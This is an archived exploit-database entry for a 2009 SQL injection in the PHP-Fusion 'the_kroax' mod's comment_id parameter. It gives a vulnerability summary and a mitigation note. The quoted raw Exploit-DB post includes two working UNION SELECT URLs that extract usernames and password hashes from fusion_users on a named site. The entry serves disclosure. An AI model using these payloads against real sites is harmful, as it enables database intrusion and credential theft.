PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability

vendor:

the_kroax

by:

FasTWORM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: the_kroax

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'comment_id' of the 'callcomments.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be exploited to disclose the content of the database, modify data, delete data, or exploit further vulnerabilities.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

PHP-Fusion Mod the_kroax (comment_id) SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------

[+]Author by : FasTWORM
[+]home: Cyber-Warrior.Org
[+]exploit:
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_name,5,6,1905+from+fusion_users/*
[+]http://www.beylerli.com/infusions/the_kroax/callcomments.php?comment_id=-999'+union+select+0,1905,2,3,user_password,5,6,1905+from+fusion_users/*
 
----------------------------------------------------------------------------------------------------------------------
[+]Greetz : BackDooR , Tr-ShaRk , All CW Users
[+]Note   : Bugun DoÄŸum GÃ¼nÃ¼m :)
----------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-01-11]